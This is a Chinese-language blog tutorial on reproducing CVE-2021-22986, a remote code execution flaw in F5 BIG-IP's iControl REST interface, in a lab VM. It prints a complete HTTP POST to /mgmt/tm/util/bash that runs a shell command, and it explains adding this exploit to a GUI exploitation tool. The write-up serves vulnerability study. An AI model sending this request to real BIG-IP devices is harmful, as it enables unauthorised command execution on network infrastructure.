如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986

本篇文章为大家展示了如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

0x01 漏洞描述

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

CVE-2021-22986 该漏洞允许未经身份验证的攻击者,通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。

0x02 漏洞影响

F5 BIG-IP 16.0.0-16.0.1 F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IQ 6.0.0-6.1.0

0x03 漏洞复现

https://login.f5.com/resource/registerEmail.do注册好后,下载

https://downloads.f5.com/esd/eula.sv?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=I+Accept选择ova格式的,可以快速使用vm虚拟机打开,安装完后,用户名:root,密码:default,成功登陆后,输入config输入config ,几次回车即可看到当前ip,访问

如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986

3.1 使用POC攻击
POST /mgmt/tm/util/bash HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Host: 192.168.1.191
Content-Length: 39

{"command":"run","utilCmdArgs":"-c id"}

如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986

0x04 利用工具编写

直接使用上次的图形化漏洞利用工具编写

图形化漏洞利用工具已更新

项目地址:https://github.com/yhy0/ExpDemo-JavaFX

V1.1

参考冰蝎的代理,添加代理设置,方便走burp调试

优化批量检查逻辑,使用接口,这样每次添加新的漏洞利用时,就不需要修改批量检查的逻辑。

src/main/java/com/yhy/core下新建CVE_2021_22986类,实现ExploitInterface接口,并实现里面的函数,具体填充,直接将项目中的示例CVE_2020_14882的内容复制过去,修改一下内容,填充payload即可

如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986

写完后,进入src/main/java/com/yhy/core/Constants.javasrc/main/java/com/yhy/tools/Tools.java修改

如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986

如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986

运行即可。

如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986

上述内容就是如何复现F5 BIG-IP远程代码执行漏洞CVE-2021-22986,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注亿速云行业资讯频道。

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/220064.html

(0)
上一篇 2022年1月2日
下一篇 2022年1月2日

相关推荐

发表回复

登录后才能评论